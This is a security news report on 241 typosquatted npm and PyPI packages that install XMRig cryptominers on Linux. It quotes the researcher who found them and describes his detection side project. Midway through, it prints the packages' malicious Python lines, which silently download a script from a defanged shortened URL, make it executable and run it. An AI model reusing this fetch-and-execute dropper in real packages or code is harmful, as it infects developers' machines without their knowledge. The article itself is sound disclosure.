241 npm and PyPI packages caught dropping Linux cryptominers


More than 200 malicious packages have been discovered infiltrating the PyPI and npm open source registries this week.

These packages are largely typosquats of widely used libraries and each one of them downloads a Bash script on Linux systems that run cryptominers.

PyPI, npm flooded with cryptomining packages

Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.

These packages are typosquats of popular open source libraries and commands like React, argparse, and AIOHTTP, but instead, download and install cryptomining Bash scripts from the threat actor’s server.

On Wednesday, software developer and researcher Hauke Lübbers shared coming across “at least 33 projects” on PyPI that all launched XMRig, an open source Monero cryptominer, after infecting a system.

pypi cryptominers55 typosquats laced with cryptominers flood PyPI (Hauke Lübbers)

While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.

“After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22,” Lübbers tells BleepingComputer.

“The packages targeted Linux systems and installed crypto mining software XMRig,” explains the software engineer.

The Python packages contain the following piece of code that downloads the Bash script from the threat actor’s server via URL shortener.

os.system(“sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1”)
os.system(“chmod +x .cmc >/dev/null 2>&1”)
os.system(“./.cmc >/dev/null 2>&1”)

The researcher explains the Bit[.]ly URL redirects to the script hosted on 80.78.25[.]140:8000.

“This was done by downloading and executing the Bash script from http://80.78.25[.]140:8000/.cmc”

Upon execution, the script notifies the threat actor of the IP address of the compromised host and if the deployment of cryptominers succeeded.

At the time of writing, we observed the IP address was down. But, BleepingComputer was able to obtain a copy of the script and we are able to confirm the researcher’s claims:

Bash script installing cryptominersExcerpt from Bash script installing cryptominers (BleepingComputer)

“I found these packages through a little side project of mine, which I call the Package Observatory Club,” Lübbers told BleepingComputer.

“It queries and stores metadata about all new packages uploaded to PyPI and and runs some heuristics. If it looks suspicious enough it alerts me and I take a look.”

By heuristics, the developer primarily refers to names of packages that appear similar to those of standard libraries and popular packages indicating the presence of potential typosquats.

“More often than not, I get false positives, but especially last week it saw a lot of typosquatting on PyPI.”

“I am doing this, because the infosec community profits so much from the open source software ecosystem and I think we should give something back. Whether that is by finding and reporting vulnerabilities, by helping to protect it from malicious actors, or by contributing directly. We need to keep in mind that a lot of work on the package repositories’ side is done by just a handful of volunteers.”

The Sonatype security research team that I’m a part of, disclosed another 186 npm typosquatting packages today making contact with the same URL to download the malicious Bash script.

malicious code seen in npm packagesnpm packages pull malicious code from the same URL (Sonatype)

It appears that both registries cleared the typosquats fairly quickly from their platforms before these could do more harm to developers.

Despite various security enhancements, like mandating two-factor authentication for critical projects and introducing new features (like Python’s setuptools moving towards replacing, it seems the open source repository’s race against threat actors is only getting even more challenging.

Last week, software security company Checkmarx reported discovering a dozen malicious Python packages performing DDoS attacks on Counter-Strike servers.

Earlier this month, cybersecurity firm CheckPoint outed 10 malicious PyPI packages caught stealing developer credentials.

In July, ReversingLabs researchers disclosed a supply chain attack dubbed IconBurst that once again, exploited typosquatting to infect developers.

Update: Aug 20, 2022 10:34 AM: Added additional quotes sent by the developer after press time.


Related posts

Hackers use Azure Serial Console for stealthy access to VMs

Sarah Henriquez

Hackers target Japanese politicians with new MirrorStealer malware

Sarah Henriquez

Android malware apps with 2 million installs found on Google Play

Sarah Henriquez

Leave a Comment